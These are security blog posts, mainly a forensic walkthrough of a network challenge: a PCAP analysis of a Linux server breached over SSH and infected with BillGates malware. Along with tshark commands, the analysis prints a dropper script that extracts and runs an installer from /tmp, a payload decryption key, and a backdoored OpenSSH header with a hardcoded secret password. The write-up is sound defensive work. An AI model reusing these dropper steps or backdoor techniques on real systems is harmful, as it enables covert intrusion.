The same amount of scripts exposed potentially sensitive data such as internal hostnames, URLs or usernames
About 60 extracted scripts included a header exposing organization name and (user)name of script developer. List of companies included known network security vendors, health care, hospitality and entertainment providers
Plenty of extracted scripts fell into “IT management” category exposing how different organizations perform endpoint, user and email accounts management, software deployment or IT monitoring

Looking at above points it is clear that majority of these scripts were meant to remain internal to organizations in which they were developed. Unfortunately, the way how scripts are packaged does not seem to make things any better. I can see how a .NET binary obfuscated with SmartAssembly, containing IsDebuggerPresent string and decrypting data from its resource section during runtime can end up with a generic detections by multiple AV engines. Then it is just a short path to situation when someone uploads such ‘flagged’ binary to VirusTotal or one of the many online sandboxes.

It seems to make perfect sense to start monitoring networks and endpoints for presence of executables generated by SAPIEN Script Packager - both for malware detection and prevention of leakage of potentially sensitive data. It is worth noting that there are also other tools that can be used to package PowerShell scripts in a similar way: ISESteroids, Posh2Exe, PowerShell Pro Tools PSPack.exe.

TekDefense Network Challenge 001 - Walkthrough

2017-03-29T21:58:51+02:00

Sometime around mid-September (of the last year!) I was tipped off about a new network forensics challenge created by @TekDefense and published on his blog. I was all up for the challenge but I did not have much time back then. Finally, I managed to spend a few evenings just before the due date to perform my analysis of the provided PCAP and document my findings.

Warning: Spoilers ahead! If you did not take the challenge yet, consider going back and trying to solve it by yourself!

To my big surprise my write-up was awarded first place. @TekDefense posted it in this blog post. Make sure to also check out @CYINT_dude’s write-up which took second place. With all that I decided to write a short follow-up, presenting how I performed my analysis and how I came to final conclusions.

Before we start please remember that:

This walkthrough and my original solution are by no means complete and probably do not tell the whole story.
I am not going to present any novel analysis techniques here. I basically followed the bottom-up principle - started with the initial alert and built the story as I was going through related events.
As always - there is more than one way to skin a cat. I would be happy to learn about different or better ways to process challenge data, correlate events, analyze files, identify indicators and write detection rules.

Toolbox

First things first. Let’s go briefly through tools I used to analyze the PCAP, develop detection rules, create a timeline and final report:

Wireshark/tshark
FakeNet
Snort
YARA
Microsoft Excel
Mou
Usual command line utilities: sort, uniq, wc, cut, strings, file

In addition to above-mentioned, I used a locked-down virtual machine running Kali Linux to execute suspicious ELF binaries.

It is also important to mention online resources and OSINT tools that were crucial for me to get additional context or better understanding of files, malware and indicators I encountered during investigation:

Reconnaissance

Having all of my tools of trade handy I decided to load the PCAP into Wireshark and start from there. As the provided Snort signature was simple and only looked for two strings it was easy to find matching packets without a need to use Snort:

alert tcp any any -> any any (msg:"HFS [File Download]";flow:to_client,established; content:"HFS 2.";distance:0; content:"HFS_SID="; classtype:suspicious; sid:999999; rev:1;)

Wireshark found 13 matching packets, each belonging to different TCP session (based on different destination ports). The Snort signature seemed to be looking for the server version and part of HTTP cookie headers set by the server in HTTP response:

Quick Google search revealed that strings in HTTP headers are characteristic to HTTP File Server (HFS) - a server designed for file sharing. According to provided challenge scenario it was a Snort hit that alerted customer about (potentially) suspicious activity.

I started wondering why file transfer from a server running specific software (HFS) could be a (potential) indicator of compromise? Well, it did not take long until I came across articles from Antiy and MalwareMustDie describing how vulnerable HFS servers were being exploited in order to serve malware.

At this point I assumed that the server 104.236.210.97 belonged to the client and was a target of malicious activity.

Initial Analysis

As the provided PCAP file was roughly 56 megabytes I felt like I need to get a better understanding of what kind of traffic was actually captured there.

With the help of several tshark filters presented below I obtained some basic stats on network protocols, sessions and ports present in the PCAP. My initial goal was to at least skim through traffic for top protocols and sessions and look for anything suspicious. Just a brief look showed large number of SSH sessions and UDP packets destined to port 80 which seemed to be a little bit off, warranting further analysis.

Mapping of number of packets and associated protocols

tshark -n -r NetChallenge_Linux.pcap -T fields -e _ws.col.Protocol | sort | uniq -c | sort -nr | head -10
TCP
QUIC
SSHv2
ARP
SSH
DNS
ICMP
HTTP
NTP
UDP

Established TCP connections and associated TCP ports (server side)

tshark -n -r NetChallenge_Linux.pcap -Y "tcp.len == 0 and tcp.seq == 1 and tcp.ack == 1 and tcp.flags.ack == 1 and not tcp.flags.reset == 1" -T fields -e tcp.dstport | sort | uniq -c | sort -nr
22
5198
80
8080
443
30890

Top 10 destination ports for UDP packets

tshark -n -r NetChallenge_Linux.pcap -Y "udp" -T fields -e udp.dstport | sort | uniq -c | sort -nr | head -10
80
53
53413
123
5060
137
1900
5353
520
161

With such amount of traffic I needed a good way to document and represent network connection data in order to be able to correlate all suspicious events. I decided to use tshark to export important information to CSV files and then import them to Excel. This seemed to be the quickest and simplest way to organize the data I needed.

I started with HTTP and used following two commands to extract needed HTTP request and response data from the PCAP:

tshark -n -r NetChallenge_Linux.pcap -Y "http.request and not ssdp" -T fields -e _ws.col.Time -e ip.src -e ip.dst -e tcp.dstport -e http.host -e http.user_agent -e http.request.method -e http.request.uri -E header=y -E separator=, > http_requests.csv

tshark -n -r NetChallenge_Linux.pcap -Y "http.response and not ssdp" -T fields -e _ws.col.Time -e ip.src -e ip.dst -e tcp.srcport -e http.response.code  -e http.server -e http.content_type -e http.content_length -E header=y -E separator=, > http_responses.csv

It was not that hard to correlate and combine both outputs. As you can expect number of HTTP requests roughly matched number of HTTP responses so it was just a matter of a single copy and paste operation to get them together in a single Excel worksheet. As a result each entry in my timeline contained fields extracted from both HTTP requests and responses making it much more readable (at least for me!).

Having my HTTP timeline ready I started reviewing and marking entries with colors. At that point I still did not have a good understanding of intrusion but as some entries seemed to be more suspicious than others it was a good way to mark them for follow up.

Throughout my analysis I used three different colors to visually expose entries:

Red: Malicious activity.
Yellow: Neutral activity that can turn either side depending on further findings.
Green: Benign activity.

After looking at collected HTTP entries I concluded that:

All HTTP requests from 104.236.210.97 to 120.210.129.29 that matched the Snort rule indicated malicious activity.
All HTTP requests from 104.236.210.97 to mirrors.digitalocean.com and nyc2.mirrors.digitalocean.com seemed to be benign as both servers are known mirrors for Debian and Ubuntu packages.
Inbound HTTP requests from 104.236.59.209 to victim server 104.236.210.97 for nc.exe and back.pl seemed to be at least suspicious.
All requests for testproxy.php seemed to be a part of common open proxy scanning and I disregarded them as benign and not related to the investigated case.
I treated requests from Microsoft-owned IP addresses 40.78.146.128 and 104.209.188.207 as benign but potentially interesting. They seemed to come from Skype Preview service indicating that someone must have sent a link to hxxp://104.236.210.97/index.html.1 over Skype - maybe even attackers exchanged a link to newly compromised server?
Rest of captured HTTP requests seemed to be a “background noise” and they were not relevant for further investigation.

As I was going through subsequent flows I started adding information about different IP addresses in a separate tab - just to have a handy source of reference.

Analysis of extracted files

Extracting files from the PCAP was not a particularly hard task. As all transfers I spotted were using HTTP I just used Wireshark’s Export Objects option:

I quickly got rid of irrelevant HTML files as most of them just represented 404 (e.g. testproxy.php) or 302 (e.g. from mirrors.digitalocean.com) HTTP responses. Just by looking at file names and their sources I had suspicions which ones will turn out to be malicious. I did not bother investigating any of .deb files as they all came from legitimate source. I also assumed that in-depth analysis of every file was not a goal of the challenge - though I still wanted to extract all relevant network and endpoint indicators. Due to lack of time I decided to rely on basic static analysis, OSINT research and only when needed - dynamic analysis.

In the first place I gathered MD5s of files of interest and used Automater to quickly query VirusTotal:

Except for the file or.bin (09b62916547477cc44121e39e1d6cc26), all queried files had detections from multiple AV products. I combined CSV output from the Automater to yet another tab in my timeline spreadsheet. I also added size, type and architecture (based on file output) columns:

Below are my notes for the BillGates binaries and the or.bin script as I found them most relevant and interesting. I’m going to skip descriptions of other extracted files like nc.exe (Netcat) or back.pl (reverse shell Perl script) as cursory analysis immediately reveals what they are.

BillGates Malware

My goal here was just to confirm that all files detected as BillGates malware were in fact malicious. I also wanted to know how does network traffic generated by each ELF executable look like. I thought that identifying such traffic in the PCAP could give me new interesting leads.

After reading several awesome write-ups on BillGates from Akamai, MalwareMustDie and Novetta I knew what to look for in collected files.

Thankfully all files were not stripped so simply running strings on them revealed some interesting details. I also noticed that all ELF files were exactly 1223123 bytes long - it was yet another indicator that they belong to BillGates malware family.

Output of the ‘file’ command

16081:        ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
SYN:          ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
SYN_1902:     ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
Trustr:       ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
java.log:     ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
xmapp:        ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped

All ELF files contained references to source code files that were almost identical to ones identified by Novetta and MalwareMustDie in their reports.

$ strings SYN | grep '\.cpp'
AmpResource.cpp
Attack.cpp
CmdMsg.cpp
ConfigDoing.cpp
DNSCache.cpp
ExChange.cpp
Global.cpp
Main.cpp
Manager.cpp
MiniHttpHelper.cpp
ProtocolUtil.cpp
ProvinceDns.cpp
StatBase.cpp
SysTool.cpp
ThreadAtk.cpp
ThreadClientStatus.cpp
ThreadConnection.cpp
ThreadDoFun.cpp
ThreadFakeDetect.cpp
ThreadHttpGet.cpp
ThreadKillChaos.cpp
ThreadLoopCmd.cpp
ThreadMonGates.cpp
ThreadRecycle.cpp
ThreadShell.cpp
ThreadShellRecycle.cpp
ThreadTask.cpp
ThreadTns.cpp
ThreadUpdate.cpp
UserAgent.cpp
AutoLock.cpp
FileOp.cpp
Ijduy.cpp
Iysd76.cpp
Log.cpp
Md5.cpp
Media.cpp
NetBase.cpp
ThreadCondition.cpp
Thread.cpp
ThreadMutex.cpp
Utility.cpp
WinDefSVC.cpp

The last file (a91261551c31a5d9eec87a8435d5d337) was a PE binary. DrWeb’s detection on VirusTotal claimed that it was BackDoor.Gates.8. I was not aware about Windows versions of BillGates malware but Stormshield’s blog post quickly got me back on the right track.

As described by Stormshield, the file contained multiple embedded PE binaries inside its resources section:

PDB paths in a91261551c31a5d9eec87a8435d5d337

$ strings winappes.exe  | grep pdb
\GatesInstall\Release\GatesInstall.pdb
\2003\i386\agony.pdb
\IECtrl\Release\IECtrl.pdb
e:\releases\winpcap_4_1_0_2001\winpcap\packetntx\driver\bin\amd64\npf.pdb
e:\releases\winpcap_4_1_0_2001\winpcap\packetNtx\Dll\Project\Release No NetMon\x64\Packet.pdb
\Gates\Release\Gates.pdb
\Gates\x64\Release\Gates.pdb

At that point I was confident that I can identify all these files as belonging to BillGates malware family in my report. The last thing I needed were network indicators.

I followed the below process for ELF files in order to obtain C&C address, protocols, and ports used for C&C communications:

I configured my Linux VM to use my other Windows VM running in the same isolated network segment as a DNS server.
I configured FakeNet to respond with IP address of my Windows VM for every observed DNS request.
I ran Wireshark and FakeNet on my Windows VM.
I executed sample and observed issued DNS requests.
I observed subsequent connection attempts and when needed I adjusted FakeNet’s configuration so it listened on specific port that malware was trying to connect.
I noted C&C addresses, used ports and saved captured traffic to PCAP file for further reference.

Below is sample analysis for the SYN binary (cd291abe2f5f9bc9bc63a189a68cac82):

DNS requests captured after executing the SYN binary (cd291abe2f5f9bc9bc63a189a68cac82)

# tcpdump -i eth0 -n 'port 53'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
25:14.794299 IP 172.16.250.133.41452 > 172.16.250.1.53: 27320+ A? top.t7ux.com. (30)
25:15.014225 IP 172.16.250.133.43559 > 172.16.250.1.53: 27576+ A? www.vnc8.com. (30)
25:20.799249 IP 172.16.250.133.48032 > 172.16.250.1.53: 28856+ A? top.t7ux.com. (30)
25:21.015454 IP 172.16.250.133.40558 > 172.16.250.1.53: 29112+ A? www.vnc8.com. (30)
25:26.798733 IP 172.16.250.133.53643 > 172.16.250.1.53: 30392+ A? top.t7ux.com. (30)
25:27.015546 IP 172.16.250.133.42158 > 172.16.250.1.53: 30648+ A? www.vnc8.com. (30)
25:32.799605 IP 172.16.250.133.33856 > 172.16.250.1.53: 31928+ A? top.t7ux.com. (30)
25:33.014514 IP 172.16.250.133.51408 > 172.16.250.1.53: 32184+ A? www.vnc8.com. (30)
25:38.799074 IP 172.16.250.133.53824 > 172.16.250.1.53: 33464+ A? top.t7ux.com. (30)
25:39.015045 IP 172.16.250.133.49985 > 172.16.250.1.53: 33720+ A? www.vnc8.com. (30)

The process for Windows version of malware (a91261551c31a5d9eec87a8435d5d337) was much simpler as I just needed to execute it in my Windows VM and observe FakeNet’s output.

Next I updated my Excel spreadsheet with collected network indicators and proceeded to the next extracted file.

or.bin

or.bin was an interesting file. Beginning of the file contained simple Bash script that read and extracted a tar.gz archive appended to the end of the script. When extracted it just started install binary:

$ head -11 or.bin
#!/bin/bash
line=`wc -l $0|awk '{print $1}'`
line=`expr $line - 10`
mkdir /tmp/.tmp123 -p && tail -n $line $0 |tar zx -C /tmp/.tmp123
rm -rf *.bin && cd /tmp/.tmp123
./install
ret=$?
#
#
#
exit $ret

The install file seemed to be a stripped 64-bit ELF binary. Interestingly, the archive contained also a file named ooz.tgz which was not a tar.gz archive as suggested by its extension. The file contained very specific header “Salted__” indicating that it was encrypted using OpenSSL.

$ file or.bin.tmp
or.bin.tmp: gzip compressed data, last modified: Tue Jun 23 05:44:34 2015, from Unix
$ tar -tvf or.bin.tmp
-rwx--x--x  0 root   root    12832 Jun 23  2015 install
-rw-r--r--  0 root   root  5672984 Jun 23  2015 ooz.tgz
$ file install
install: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.9, stripped
$ file ooz.tgz
ooz.tgz: data
$ xxd -l 16 ooz.tgz
00000000: 5361 6c74 6564 5f5f 2d91 d71e 0a4f 02f2  Salted__-....O..

It looked like I would need to analyze the install file to learn how to decrypt ooz.tgz. Unfortunately, after initial inspection I knew that it will not be that easy. Binary seemed to implement several anti-analysis techniques. All strings in the binary were obfuscated:

Basic anti-debugging was implemented by making one of the child processes attach to the main process using a ptrace() call, effectively preventing use of debuggers and tools like strace:

# strace -f ./install
(...)
[pid 38792] open("/proc/38791/as", O_RDWR|O_EXCL) = -1 ENOENT (No such file or directory)
[pid 38792] ptrace(PTRACE_ATTACH, 38791, 0, 0) = -1 EPERM (Operation not permitted)
[pid 38792] dup(2)                      = 0
[pid 38792] fcntl(0, F_GETFL)           = 0x8002 (flags O_RDWR|O_LARGEFILE)
[pid 38792] brk(0)                      = 0x1078000
[pid 38792] brk(0x1099000)              = 0x1099000
[pid 38792] fstat(0, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
[pid 38792] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f370a63a000
[pid 38792] lseek(0, 0, SEEK_CUR)       = -1 ESPIPE (Illegal seek)
[pid 38792] write(0, "./install: Operation not permitt"..., 35./install: Operation not permitted
) = 35
[pid 38792] close(0)                    = 0
[pid 38792] munmap(0x7f370a63a000, 4096) = 0
[pid 38792] kill(38791, SIGKILL)        = 0
[pid 38792] exit_group(0)               = ?
Process 38791 resumed
Process 38792 detached

When I placed the file in a separate directory (so it did not ‘see’ ooz.tgz) and executed it, I noticed some strange output - like it was trying to spawn system commands:

# ./install 
dd: opening `ooz.tgz': No such file or directory
error reading input file

gzip: stdin: unexpected end of file
tar: Child returned status 1
tar: Error is not recoverable: exiting now
tar (child): jack.tgz: Cannot open: No such file or directory
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
tar (child): openssl-1.0.0e.tar.gz: Cannot open: No such file or directory
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
./install: 11: cd: can't cd to openssl-1.0.0e
(...)

If my suspicion was correct, the program was deobfuscating strings during runtime and then passing them as arguments to execvp() function (which was visible when I opened the binary in IDA). I needed a way to get insight into what exactly is passed to execvp() calls without actually attaching debugger to the process.

After short research I found snoopy which seemed to do exactly what I needed. After enabling Snoopy and running install binary again I found following entries in a log file:

snoopy[47478]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:./install]: ./install 
snoopy[47483]: [uid:0 sid:6645 tty: cwd:/tmp filename:/bin/tar]: tar zxf - 
snoopy[47482]: [uid:0 sid:6645 tty: cwd:/tmp filename:/usr/bin/openssl]: openssl des3 -d -k buWwe9ei2fiNIewOhiuDi 
snoopy[47481]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:/bin/dd]: dd if=ooz.tgz 
snoopy[47486]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:/bin/tar]: tar zxvf jack.tgz 
snoopy[47488]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:/bin/rm]: rm -rf jack.tgz 
snoopy[47489]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:/bin/rm]: rm -rf ooz.tgz 
snoopy[47490]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:/bin/tar]: tar xzvf openssl-1.0.0e.tar.gz 
snoopy[47492]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:./config]: ./config --prefix=/usr/local/openssl 
snoopy[47493]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:/usr/bin/make]: make 
snoopy[47494]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:/usr/bin/make]: make install 
snoopy[47495]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/usr/local filename:/bin/ln]: ln -s openssl ssl 
snoopy[47496]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/usr/local filename:/sbin/ldconfig]: ldconfig 
snoopy[47497]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/usr/local filename:/usr/bin/ldd]: ldd /usr/local/openssl/bin/openssl 
snoopy[47499]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:/bin/rm]: rm -rf openssl-1.0.0e* 
snoopy[47500]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:/bin/tar]: tar xzvf zlib-1.2.3.tar.gz 
snoopy[47502]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:/usr/bin/make]: make clean 
snoopy[47503]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:/usr/bin/make]: make 
snoopy[47504]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/usr/local filename:/bin/rm]: rm -rf zlib-1.2.3* 
snoopy[47505]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/usr/local filename:/bin/tar]: tar zxvf openssh-5.9p1.tgz 
snoopy[47507]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/usr/local filename:./configure]: ./configure --prefix=/usr --sysconfdir=/etc/ssh 
snoopy[47508]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/usr/local filename:/usr/bin/make]: make 
snoopy[47509]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/usr/local filename:/etc/init.d/sshd]: /etc/init.d/sshd restart 
snoopy[47510]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:/bin/rm]: rm -rf openssh* 
snoopy[47511]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:/bin/rm]: rm -rf jack* 
snoopy[47512]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:/bin/rm]: rm -rf install.sh 
snoopy[47513]: [uid:0 sid:6645 tty:/dev/pts/0 cwd:/tmp filename:/bin/rm]: rm -rf /tmp/.tmp123

Bingo! It looked like the binary was decrypting ooz.tgz file with the DES3 key buWwe9ei2fiNIewOhiuDi, decompressing the archive and then compiling OpenSSL and OpenSSH from resulting source code. That definitely looked suspicious!

$ openssl des3 -d -k buWwe9ei2fiNIewOhiuDi -in ooz.tgz -out ooz_decrypted.tgz
$ file ooz_decrypted.tgz 
ooz_decrypted.tgz: gzip compressed data, from Unix, last modified: Tue Jun 23 12:41:38 2015
$ tar -tvf ooz_decrypted.tgz 
-rw-r--r-- root/root   5671346 2015-06-23 11:52 jack.tgz

The decrypted file contained yet another archive jack.tgz which in turn contained source code archives for OpenSSL, OpenSSH and zlib.

$  file jack.tgz 
jack.tgz: gzip compressed data, from Unix, last modified: Tue Jun 23 11:52:50 2015
$ tar -tvf jack.tgz 
-rw-r--r-- root/root   1155501 2015-06-23 11:49 openssh-5.9p1.tgz
-rw-r--r-- root/root   4040229 2015-06-18 10:06 openssl-1.0.0e.tar.gz
-rw-r--r-- root/root    496597 2015-06-18 10:06 zlib-1.2.3.tar.gz

I assumed that the final goal of the install binary was to install a modified version of OpenSSH and proceeded to closer inspection of the OpenSSH archive.

The great thing about tar archives is that by default they preserve some metadata about the archived files, including file ownership and modification timestamp. I skimmed through output of ls -lR command and it did not took long to notice that small part of the files from the extracted archive openssh-5.9p1.tgz had different owner (root) and much later modification time than the rest:

$ ls -lR | grep root
-rw-r--r-- 1 root root     17944 Jun 23  2015 auth.c
-rw-r--r-- 1 root root     31711 Jun 23  2015 auth-pam.c
-rw-r--r-- 1 root root      6525 Jun 23  2015 auth-passwd.c
-rw-r--r-- 1 root root     11347 Jun 23  2015 canohost.c
-rw-r--r-- 1 root root      4088 Jun 23  2015 includes.h
-rw-r--r-- 1 root root     10035 Jun 23  2015 log.c
-rw-r--r-- 1 root root     54168 Jun 23  2015 servconf.c
-rw-r--r-- 1 root root      6623 Jun 23  2015 sshbd5.9p1.diff
-rw-r--r-- 1 root root     51056 Jun 23  2015 sshconnect2.c
-rw-r--r-- 1 root root      5291 Jun 23  2015 sshlogin.c
-rw-r--r-- 1 root root       172 Jun 23  2015 version.h

As far as I could tell all modifications were consistent with OpenSSH backdooring article presented in this e-zine.

$ grep -A4 secret_ok includes.h
int secret_ok;
FILE *f;
#define ILOG "/bin/.ilog"
#define OLOG "/bin/.olog"
#define SECRETPW "lihao023.."

I stopped analysis of the or.bin file at this stage. With the new lead I kept a mental note to check the PCAP for (suspicious) SSH connections later on.

DNS Analysis

My primary goal here was to check if PCAP contained any DNS queries for malware C&C domains identified earlier. I thought it would be a good indicator that malware was executed on a compromised server. Instead of checking each domain one by one I decided to export all DNS queries and responses from the PCAP and add them to my spreadsheet:

$ tshark  -n -r NetChallenge_Linux.pcap -Y "dns and not icmp" -T fields -e _ws.col.Time -e ip.src -e ip.dst -e dns.flags.response -e dns.qry.name -e dns.a  -E header=y -E separator=, > dns.csv

I was not really surprised when I saw that first DNS query recorded in the PCAP was for one of known domains top.t7ux.com:

As I was able to easily filter my results I immediately knew that the domain resolved to two different IP addresses:

118.192.137.245 (until 2016-09-08 10:39:57Z)
222.174.168.234 (starting at 2016-09-08 10:18:13Z)

I noted the following timestamp: 2016-09-07 22:19:03Z as an approximate time when malware was executed on a compromised system. I did not have any hard proofs but it was a good start.

I also briefly reviewed other DNS queries sent by the compromised server, but I did not find anything else worth digging in. There was just this one strange query sent at 2016-09-07 23:53:44Z:

Was it possibly an attacker and his fat fingers mistyping something like host -l in a console window?

C&C Traffic Analysis

Getting actual C&C traffic was easy as I already knew IP addresses, protocols and ports used by malware. I decided to export each C&C packet to be able to see any changes in beaconing pattern. Initially I filtered out all retransmitted packets for better visibility.

I used the following tshark options to export all C&C traffic to a CSV file:

tshark -n -r NetChallenge_Linux.pcap -Y "(ip.addr==118.192.137.245 or ip.addr==222.174.168.234) and not icmp and not tcp.analysis.retransmission" -T fields -e _ws.col.Time -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport -e tcp.len -e data -E header=y -E separator=, > gates.csv

When I was analyzing the beaconing pattern, I noticed that for the first ~12 hours malware sent 45 identical messages, each approximately 15 minutes apart from the previous one. Based on Akamai’s write-up I was able to extract following information from captured messages:

IP address of the infected machine: 0x68ecd261 (1760350817) => 104.236.210.97
DNS addresses: 0x68ecd261 (1760350817) => 104.236.210.97
Number of CPUs: 1
CPU MHz: 0x95f (2399)
Total memory: 0x1e8 (488)
Kernel name and version: Linux 4.4.0-36-generic
Malware version: 1:G2.40

There were no responses from any of C&C servers until 2016-09-09 13:46:05Z when 222.174.168.234 sent 18 messages containing following data 0400000000000000 in one second intervals.

But here is the problem - only by accident I noticed that there was some additional data exchanged between compromised system and C&C that I missed due to display filter I used to export data with tshark. Wireshark also did not show that data in the “Follow TCP Stream” windows as it was not able to correctly reconstruct entire conversation.

The exchanged data turned out be be crucial for further investigation. For every 0400000000000000 message sent by C&C there was a response packet from the compromised host containing what looked like an IP address:

This message exchange resembled what @unixfreakjp named “3rd step” in his post on KernelMode.info. Nowhere in the PCAP did I find initial two steps of communication between compromised host and C&C (222.174.168.234).

Yet again I referenced Akamai’s write-up and I noticed that responses sent by compromised host to some degree mirrored initial command message sent by C&C (which was missing in the provided PCAP). Based on their analysis it looked like in this case the malware was instructed to perform a DoS attack against IP address 23.83.106.115 over UDP (value 0x20) port 80 (0x50). Nice, one more lead to check!

UDP Analysis

I jumped straight into checking if any suspicious UDP traffic was present in the provided packet capture. I used Wireshark and its “Statistics -> Conversations” menu:

32038 UDP packets on port 80 sent from 104.236.210.97 towards 23.83.106.115? Well, that was kind of… expected (I also recalled 32082 QUIC packets listed by tshark in the Protocol summary. As the rest of UDP conversations seemed pretty standard I simply exported all metadata about UDP packets sent to the attacked host:

tshark  -n -r NetChallenge_Linux.pcap -Y "ip.addr==23.83.106.115" -T fields -e _ws.col.Time -e ip.src -e ip.dst -e udp.srcport -e udp.dstport -e udp.length  -E header=y -E separator=, > gates_dos.csv

The amount of packets and short interval between them was telling. Compromised host transferred approximately 32 megabytes of data in just half a second. All packets were sourced from UDP port 55198 and were between 965 and 989 bytes long (minus static 8 byte UDP header).

SSH Analysis

Although at this stage I had good overview of what happened, I was still missing one important piece of the puzzle - initial infection vector. Based on couple of writeups I knew that actors behind the BillGates botnets very often compromise Linux machines by using SSH and brute forcing root password.

Using my standard ‘per-packet’ tshark export format was not of much help in this case as I wanted to know length of each session and amount of exchanged data. My initial assumption was that by looking only at these values I’ll be able to tell which SSH session was successful (as in: user provided correct username and password and was granted access to console) and which was not (e.g. it was a failed brute-force attempt). I needed to know if there was any successful session established just before suspicious events started occurring on the compromised host or if there were any brute-force attempts.

I quickly tested two scenarios where I connected to my VPS over SSH and captured traffic for both successful logon and failed attempts (3 seems to be a default setting for OpenSSH). Getting a command line prompt needed approximately 8500 bytes to be exchanged between SSH client and server (in ~24 packets). Three consecutive (failed) login attempts generated approximately 6700 bytes (in ~26 packets). These were of course rough estimates and likely were dependent on specific configuration but at least they gave me some idea. I assumed that every SSH conversation with higher number of exchanged data and frames would be indicative of successful user login over SSH protocol.

I used the following command to list all TCP conversations in the challenge PCAP and then filtered out all that were not over port 22:

$ tshark -t ud -n -r NetChallenge_Linux.pcap -qz conv,tcp | grep -E "([0-9]{1,3}[\.:]){4}22\s" | head -10
101.128.129:51202       <-> 104.236.210.97:22             4046    679341    4900    399541    8946   1078882  2016-09-07 22:16:07     11158.7515
171.119.98:58968        <-> 104.236.210.97:22               97     23286     123     14526     220     37812  2016-09-08 01:22:09        16.5526
101.128.129:51201       <-> 104.236.210.97:22               39      6871      40      6137      79     13008  2016-09-07 22:14:48        72.1657
224.160.184:54269       <-> 104.236.210.97:22               22      3717      24      3075      46      6792  2016-09-08 02:19:11        14.0569
224.160.184:56710       <-> 104.236.210.97:22               22      3717      23      3009      45      6726  2016-09-08 02:18:43        14.4332
224.160.184:59887       <-> 104.236.210.97:22               22      3717      23      3009      45      6726  2016-09-08 02:19:31        15.9564
224.160.184:33751       <-> 104.236.210.97:22               22      3717      23      3009      45      6726  2016-09-08 02:20:15        14.3399
224.160.184:51739       <-> 104.236.210.97:22               22      3717      22      2943      44      6660  2016-09-08 02:19:47        13.5479
224.160.184:50516       <-> 104.236.210.97:22               22      3717      21      2877      43      6594  2016-09-08 02:18:58        13.3001
27.121.121:11067       <-> 104.236.210.97:22               18      3645      17      2561      35      6206  2016-09-08 01:56:19         6.5652

Based on lengths of sessions and amount of exchanged data I selected two SSH clients: 46.101.128.129 and 71.171.119.98. In case of 46.101.128.129 both SSH sessions started just before first HFS file download occurred (at 2016-09-07 22:16:16Z). Taking into account timing and lack of any other suspicious connections I assumed it was the attacker that successfully authenticated to the compromised host over SSH. My suspicion was that the initial session was a successful brute-force attempt, while the second session was used to deploy malware and adjust compromised host to attacker’s needs. Looking at short time between both sessions and also between subsequent events it was evident that whole process was at least semi-automated. As a side note I need to say that I would restrain from formulating such far-reaching conclusion if it was a real life scenario and I would definitely try to obtain additional evidence!

The PCAP did not contain initial handshake for SSH connection from the IP address 71.171.119.98 and thus I was not able to tell when the session has started (prior or after attacker’s activity) and if the session was much longer than 16 seconds reported by Wireshark.

Rest of the SSH connections seemed to be unsuccessful brute force attempts. Most of them were characterized by the use of the libssh library by clients (visible in the initial SSH message from the client), short duration and low number of exchanged data.

Putting It Together

Having all the data and findings handy it was just a matter of drafting a final report with answers to challenge questions. As a final step I proceeded with creating a master timeline as a an ultimate source of reference. Not having much time left I did not bother with proper formatting or using any template - I simply thrown all entries into a new Excel sheet and sorted them by timestamp. The story of a breach was immediately apparent:

That is it! As mentioned in the beginning, the final write-up was posted by @TekDefense on his blog. You can also find timeline spreadsheet here.

Webshells: Rise of the Defenders (Part 4)

2016-12-07T12:36:49+01:00

Below post is a continuation of a series dedicated to webshells. In the first part we presented a short introduction to webshells, explaining what they are and what are the most common installation vectors on victim machines. Second presented a real life intrusion scenario where webshells played a major role. In the third part we introduced defence strategies and tested webshell detection tools.

